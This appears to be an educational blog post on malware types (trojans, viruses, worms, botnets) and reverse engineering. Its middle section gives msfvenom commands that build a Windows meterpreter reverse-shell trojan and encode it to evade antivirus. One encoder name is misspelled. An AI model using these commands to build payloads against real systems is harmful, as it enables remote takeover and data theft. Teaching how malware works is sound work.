Masters of Computer Science Cyber Security

Malware Threats in Cyber Security. What actually it is?

Malware Threats in Cyber Security. What actually it is?

Malware Overview

Malware is a malicious software that damages or disables computer systems and gives limited or full control of the systems to the malware creator for the purpose of theft or fraud.

  • Malware (Malicious Software) is a “catch-all” term for a code or program which is hostile and harmful to computer applications, hardware and infrastructure.
  • Malware can have different forms and functions.
  • Viruses, Worms, Trojans, Rootkits, Spyware, Adware, Ransomware are all types of malware.

Trojan Concepts

  • A Trojan, is a type of malicious code or software that looks legitimate but can take control of your computer.
  • A Trojan is designed to damage, disrupt, steal, or in general inflict some other harmful action on your data or network. Once installed, a Trojan can perform the action it was designed for.
  •  Trojans get activated upon users’ certain predefined actions.

How Hackers Use Trojans ??

  • Delete or replace operating system’s critical files.
  • Record screenshots, audio, and video of victim’s PC.
  •  Use victim’s PC for spamming and blasting email messages.
  • Download spyware, adware, and malicious files.
  •  Disable firewalls and antivirus.
  • Create backdoors to gain remote access.
  •  Use victim’s PC as a botnet to perform DDoS attacks.
  • Steal information such as passwords, security codes, credit card information using keyloggers.

How to Create Trojans in Kali Linux: msfvenom

Attacker Host IP =

Create Trojan with msfvenom

msfvenom -p [payload] LHOST=[Your IP address] LPORT=[Port number] -f [file type] > [path]

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > trojan1.exe

 Encrypt your Trojan with Shikata_ga_nai encoder

msfvenom -p [payload] LHOST=[your ip address] LPORT=[the port number] -e [encoder] -i [number of times to encrypt] -f [file type] > [path]

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_mai -i 100 -f exe > encryptedtrojan.exe

Virus and Worm Concepts

  • A computer virus is a type of malware that propagates by inserting a copy of itself into and becoming part of another program. It spreads from one computer to another, leaving infections as it travels.
  •  Almost all viruses are attached to an executable file, which means the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious host file or program.
  •  Worms are standalone software and do not require a host program or human help to propagate

Why do People create Virus ??          

  • Inflict damage to competitors
  •  Financial benefits
  • Research projects
  •  Play prank
  •  Vandalism
  • Cyber terrorism
  •  Distribute political messages

Stages of Virus Life

  • Design: Developing virus code using programming languages or construction kits.
  •  Replication: Virus replicates for a period of time within the target system and then spreads itself.
  • Launch: It gets activated with the user performing certain actions such as running an infected program.
  • Detection: A virus is identified as threat infecting target systems.
  • Incorporation: Antivirus software developers assimilate defenses against the virus.
  •  Elimination: Users install antivirus updates and eliminate the virus threats.

Zombie: What it is ??

“A bot is a type of malware which allows an attacker to gain complete control over the affected computer. Computers that are infected with a bot are generally referred to as ‘zombies’ “.

“Networks of Zombie Computers are referred as Botnets”

Malware Reverse Engineering

  • Reverse engineering has long been the leading method for understanding how malicious programs operate and what they’re engineered to do. Reverse engineering as a process has evolved as malware has become more sophisticated and detection tools have improved, but it remains critical.
  •  Reverse engineering malware involves disassembling (and sometimes decompiling) a software program.
  •  Through this process, binary instructions are converted to code mnemonics (or higher level constructs) so that engineers can look at what the program does and what systems it impacts.

Malware Analysis Tools

About Author

ICT Byte